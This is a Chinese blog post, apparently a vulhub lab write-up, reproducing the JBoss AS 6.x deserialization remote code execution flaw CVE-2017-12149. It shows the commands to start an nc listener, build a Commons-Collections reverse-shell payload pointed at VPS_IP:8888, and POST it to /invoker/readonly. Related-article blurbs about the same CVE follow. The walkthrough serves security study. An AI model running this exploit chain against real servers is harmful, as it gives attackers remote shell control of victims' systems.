【vulhub】CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞

最新推荐文章于 2023-10-31 14:25:57 发布
最新推荐文章于 2023-10-31 14:25:57 发布
阅读量2.9k 收藏
点赞数
分类专栏: JBoss 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121820890
版权

前言

2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

一、启动靶机

docker-compose build

docker-compose up -d

二、漏洞挖掘

访问如下URL时,出现下图报错

http://192.168.150.146:8080/invoker/readonly

在这里插入图片描述

三、漏洞利用

1、下载利用工具:JavaDeserH2HC(http://scan.javasec.cn/java/JavaDeserH2HC.zip)
2、用VPS nc监听8888端口

nc -lvp 8888

3、把上面下载到的工具复制到 vps 里面,解压即可,进入解压目录,输入如下命令:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap VPS_IP:8888

(IP是VPS的ip,8888是下面要监听的端口,这里写哪个端口下面就要监听哪个端口)
在这里插入图片描述
4、因为我公网vps访问不到靶机,所以我把生成ReverseShellCommonsCollectionsHashMap.ser文件放到真实主机执行

curl http://192.168.150.146:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

上述命令的IP为靶机,即目标。
在这里插入图片描述

四、检验

在VPS上,nc收到反弹shell在这里插入图片描述

参考:

https://www.cnblogs.com/Oran9e/p/7897102.html

Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 997
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 1360
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
zx980414k的博客
04-16 203
访问域名/invoker/readonly,若返回http status 500,说明漏洞存在,可以进行反序列化命令执行。 漏洞利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip
JBoss5.x6.x反序列化漏洞CVE-2017-12149)复现学习
hklearner的博客
03-29 2135
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)复现学习 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞概要 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至。
07-08 1710
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Jboss CVE-2017-12149 漏洞复现(vulhub)
MDSEC的博客
08-24 261
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞CVE-2017-12149)复现
qq_45300786的博客
04-14 1065
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
JBOSS AS 5.X/6.X 反序列化漏洞(CVE-2017-12149)复现
andiao1218的博客
02-05 374
本机IP:192.168.220.145 靶机IP:192.168.220.139,版本为JBOSS AS 6.1.0 Final 首先访问目标地址,http://192.168.220.139:8080/invoker/readonly 返回500,一般存在 执行命令 ┌─[root@sch01ar]─[~] └──╼ #cd /sch01ar/JavaDeserH...
VulhubCVE-2017-12149 JBOSS反序列化漏洞复现
看不尽的尘埃——博客
02-06 2345
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131       过程 下载POC:https://github.com/joaomatosf/JavaDeserH2HC POC使用方法: 攻击机下载执行执行生成二进制payload文件: javac -cp .:commons-collec...
JBoss AS 6.0.0。最终版
06-15 355
JBoss应用服务器(AS)6.0.0.Final于2010年12月28日发布。JBoss AS 6.0.0 Final是Java EE 6 Web Profile规范的完全认证实现,但它还引入了新的非EE 6功能。太。 在这次采访中,JAXenter在发行版中与JBoss应用服务器小组的经理Dimitris Andreadis进行了交谈…… JAXenter:为什么Application...
Jboss反序列化远程代码执行漏洞CVE-2017-12149
weixin_46411728的博客
08-28 1696
Jboss反序列化远程代码执行漏洞CVE-2017-12149
CVE-2017-12149漏洞复现
最新发布
zkaqlaoniao的博客
10-31 405
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4485
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 1594
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149是JBOSS应用服务器中的一个远程代码执行漏洞。JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的HTTP Invoker组件没有正确地验证反序列化的对象。攻击者可以通过HTTP请求发送一个恶意的序列化对象,该对象会被反序列化并在服务器上执行代码。攻击者可以利用这个漏洞完全接管服务器,执行任意代码,包括修改、删除、添加文件等操作。 该漏洞影响JBoss Application Server 5.x、6.x和7.x版本。Red Hat已经发布了相关的安全公告和补丁,建议用户及时更新。 总之,CVE-2017-12149漏洞的危害非常严重,对于使用JBOSS应用服务器的用户来说,需要及时关注并采取措施进行修复和防范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值